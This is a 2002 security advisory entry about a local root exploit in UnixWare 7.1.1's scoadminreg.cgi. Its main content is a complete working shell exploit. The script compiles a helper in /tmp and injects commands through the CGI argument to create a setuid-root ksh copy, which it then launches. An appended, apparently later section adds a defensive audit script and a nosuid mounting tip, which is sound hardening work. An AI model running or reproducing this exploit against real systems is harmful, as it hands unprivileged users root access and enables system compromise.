23rd Jan 2002 [SBWID-5021]
COMMAND
scoadminreg.cgi local root exploit
SYSTEMS AFFECTED
Unixware 7.1.1
PROBLEM
jGgM posted [http://www.netemperor.com/] :
see exploit below
Exploit :
=========
#!/bin/sh
CC="gcc"
SCOADMIN=/opt/webtop/bin/i3un0212/cgi-bin/admin/scoadminreg.cgi
#
#
#
#
echo
echo "jGgM root exploit"
echo "http://www.netemperor.com/"
echo
echo "Mail: jggm@mail.com"
echo
if [ ! -x $SCOADMIN ]; then
    echo "$SCOADMIN file not found"
    exit 2;
fi
cat >/tmp/jggm.c <<_EOF
main()
{
    setuid(0);
    setgid(0);
    chown("/tmp/jGgM_Shell", 0, 0);
    chmod("/tmp/jGgM_Shell", 04755);
}
_EOF
cp /bin/ksh /tmp/jGgM_Shell
$CC -o /tmp/jggm /tmp/jggm.c
$SCOADMIN "-c /tmp/jggm;/tmp/jggm;"
rm -rf /tmp/jggm /tmp/jggm.c
/tmp/jGgM_Shell
# end of file..
SOLUTION
Upgrade available ??
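With no fix listed, the practical check is for what the exploit leaves behind: it ends by making /tmp/jGgM_Shell a root-owned copy of ksh with mode 04755. The audit script below is an added example, not part of the original advisory or the author's code; the function names and the directories passed to it are this example's own choices, and the CGI path is the one used in the exploit.

```sh
#!/bin/sh
# Added example: audit for the artifacts the exploit above leaves behind.
# Function names are hypothetical; only SCOADMIN comes from the advisory.

SCOADMIN=/opt/webtop/bin/i3un0212/cgi-bin/admin/scoadminreg.cgi

# Print every regular file under the given directories that carries a
# set-UID or set-GID bit. Returns 0 if at least one was found, 1 if none.
find_setid_files() {
    found=1
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        out=$(find "$dir" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
              2>/dev/null) || true
        if [ -n "$out" ]; then
            printf '%s\n' "$out"
            found=0
        fi
    done
    return $found
}

# Classify a path: "absent", "setid" (set-UID or set-GID bit present)
# or "plain" (exists without either bit).
cgi_status() {
    if [ ! -e "$1" ]; then echo absent
    elif [ -u "$1" ] || [ -g "$1" ]; then echo setid
    else echo plain
    fi
}

# Report on the CGI and on the scratch directories given as arguments.
# Returns 1 when any set-ID file is present there, so cron can alert on it.
audit() {
    echo "CGI $SCOADMIN: $(cgi_status "$SCOADMIN")"
    if find_setid_files "$@"; then
        echo "set-ID files in scratch directories: investigate and remove"
        return 1
    fi
    echo "no set-ID files under: $*"
}

# Run only when directories are named on the command line,
# e.g.  sh audit.sh /tmp /var/tmp
if [ "$#" -gt 0 ]; then audit "$@"; fi
```

Mounting /tmp with the nosuid option, where the platform supports it, prevents a set-UID shell placed there from gaining privilege when executed.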